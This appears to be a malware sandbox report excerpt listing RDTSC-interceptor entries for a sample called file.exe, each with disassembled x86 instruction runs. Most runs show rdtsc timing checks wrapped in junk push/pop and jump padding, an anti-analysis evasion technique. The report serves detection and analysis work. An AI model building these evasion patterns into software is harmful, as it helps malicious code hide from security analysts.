                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F5803 second address: 13F581C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE903A96Ch 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F581C second address: 13F582E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE9061D6Dh 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F582E second address: 13F584E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFAE903A96Fh 0x00000008 jnl 00007FFAE903A966h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F59B4 second address: 13F59BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F59BA second address: 13F59C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007FFAE903A966h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE958 second address: 13FE95F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13805BD second address: 13805CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13805CB second address: 13805E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE9061D6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13805E0 second address: 13805F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE903A973h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FDB74 second address: 13FDB7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FDB7A second address: 13FDB80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FDCEF second address: 13FDD17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007FFAE9061D66h 0x0000000b jbe 00007FFAE9061D66h 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push esi 0x0000001c pop esi 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 jne 00007FFAE9061D68h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FDD17 second address: 13FDD42 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 jmp 00007FFAE903A975h 0x0000000e jmp 00007FFAE903A96Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FDE7E second address: 13FDE8C instructions: 0x00000000 rdtsc 0x00000002 js 00007FFAE9061D68h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE264 second address: 13FE268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE268 second address: 13FE26E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE26E second address: 13FE277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE277 second address: 13FE27F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139EEF4 second address: 139EF0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE903A977h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE7D7 second address: 13FE7DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FD188 second address: 13FD18C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FD18C second address: 13FD199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1402559 second address: 140255D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B7F34 second address: 13B7F3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8440 second address: 13B8446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8446 second address: 13B844A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B844A second address: 1201A16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FFAE903A968h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 mov edx, esi 0x00000027 push dword ptr [ebp+122D0C35h] 0x0000002d movsx ecx, ax 0x00000030 jmp 00007FFAE903A977h 0x00000035 call dword ptr [ebp+122D1926h] 0x0000003b pushad 0x0000003c add dword ptr [ebp+122D18A0h], edi 0x00000042 xor eax, eax 0x00000044 clc 0x00000045 mov edx, dword ptr [esp+28h] 0x00000049 cmc 0x0000004a mov dword ptr [ebp+122D2AF3h], eax 0x00000050 mov dword ptr [ebp+122D18A0h], eax 0x00000056 mov esi, 0000003Ch 0x0000005b or dword ptr [ebp+122D18A0h], ebx 0x00000061 add esi, dword ptr [esp+24h] 0x00000065 stc 0x00000066 lodsw 0x00000068 stc 0x00000069 add eax, dword ptr [esp+24h] 0x0000006d stc 0x0000006e mov ebx, dword ptr [esp+24h] 0x00000072 jmp 00007FFAE903A978h 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b push edx 0x0000007c pushad 0x0000007d popad 0x0000007e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8510 second address: 13B8515 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8515 second address: 13B851B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B851B second address: 13B853F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFAE9061D78h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B86F0 second address: 13B86F9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B86F9 second address: 13B86FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8914 second address: 13B8918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B89F3 second address: 13B89F8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B89F8 second address: 13B8A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FFAE903A972h 0x0000000d nop 0x0000000e mov cl, 95h 0x00000010 push 00000004h 0x00000012 xor dword ptr [ebp+122D1C0Dh], ecx 0x00000018 nop 0x00000019 pushad 0x0000001a pushad 0x0000001b jg 00007FFAE903A966h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8A28 second address: 13B8A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FFAE9061D66h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8A35 second address: 13B8A47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FFAE903A968h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8E87 second address: 13B8E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 or dl, 00000064h 0x0000000c push 0000001Eh 0x0000000e mov di, ax 0x00000011 nop 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8E9E second address: 13B8EB8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFAE903A966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007FFAE903A96Ch 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B91DE second address: 139EEF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jnc 00007FFAE9061D6Ch 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f xor cx, C104h 0x00000014 cmc 0x00000015 call dword ptr [ebp+122D22C0h] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FFAE9061D74h 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140286D second address: 140288E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FFAE903A976h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140288E second address: 14028CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE9061D72h 0x00000007 pushad 0x00000008 js 00007FFAE9061D66h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007FFAE9061D74h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b jp 00007FFAE9061D66h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14028CD second address: 14028D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1402CF4 second address: 1402CFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1402E39 second address: 1402E4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007FFAE903A966h 0x00000009 jnl 00007FFAE903A966h 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1402E4F second address: 1402E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14032B3 second address: 14032D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FFAE903A966h 0x0000000a popad 0x0000000b jmp 00007FFAE903A96Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14032D0 second address: 14032E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE9061D6Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14059F0 second address: 1405A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE903A979h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1405A14 second address: 1405A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1405A18 second address: 1405A1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1405A1C second address: 1405A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c jmp 00007FFAE9061D6Ch 0x00000011 pop ecx 0x00000012 jnl 00007FFAE9061D68h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1405A3D second address: 1405A48 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007FFAE903A966h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140E68D second address: 140E6AD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFAE9061D7Bh 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007FFAE9061D73h 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8BF7 second address: 13B8BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8EB4 second address: 13B8EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140EF19 second address: 140EF23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140EF23 second address: 140EF2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140EF2B second address: 140EF37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140EF37 second address: 140EF3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140EF3B second address: 140EF58 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FFAE903A975h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1413BFA second address: 1413C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FFAE9061D66h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFAE9061D79h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1413C20 second address: 1413C4D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jno 00007FFAE903A966h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d je 00007FFAE903A966h 0x00000013 jne 00007FFAE903A966h 0x00000019 popad 0x0000001a popad 0x0000001b pushad 0x0000001c push ebx 0x0000001d push edx 0x0000001e pop edx 0x0000001f pop ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FFAE903A96Bh 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141312E second address: 1413136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1413136 second address: 141315F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFAE903A966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FFAE903A979h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141315F second address: 1413169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14132C7 second address: 14132CC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14132CC second address: 14132D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14132D2 second address: 14132F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FFAE903A972h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jne 00007FFAE903A968h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14132F8 second address: 14132FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14132FC second address: 141332B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FFAE903A96Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFAE903A979h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1413616 second address: 1413624 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1416DF2 second address: 1416E37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE903A976h 0x00000007 pushad 0x00000008 js 00007FFAE903A966h 0x0000000e jnl 00007FFAE903A966h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FFAE903A979h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1416E37 second address: 1416E71 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FFAE9061D7Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FFAE9061D75h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1416E71 second address: 1416E75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14163D7 second address: 14163F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FFAE9061D70h 0x0000000a jng 00007FFAE9061D68h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141658C second address: 14165A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE903A96Ah 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FFAE903A966h 0x00000012 jns 00007FFAE903A966h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14165A9 second address: 14165C6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FFAE9061D71h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14165C6 second address: 14165E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE903A976h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1416745 second address: 1416749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1416749 second address: 1416780 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFAE903A966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007FFAE903A982h 0x00000013 jp 00007FFAE903A97Bh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1416780 second address: 1416793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE9061D6Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1368D69 second address: 1368D74 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1368D74 second address: 1368DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE9061D75h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FFAE9061D72h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419F72 second address: 1419F76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141F979 second address: 141F97D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141FC41 second address: 141FC45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141FC45 second address: 141FC49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142028E second address: 1420292 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1420549 second address: 1420555 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jp 00007FFAE9061D66h 0x0000000c rdtsc
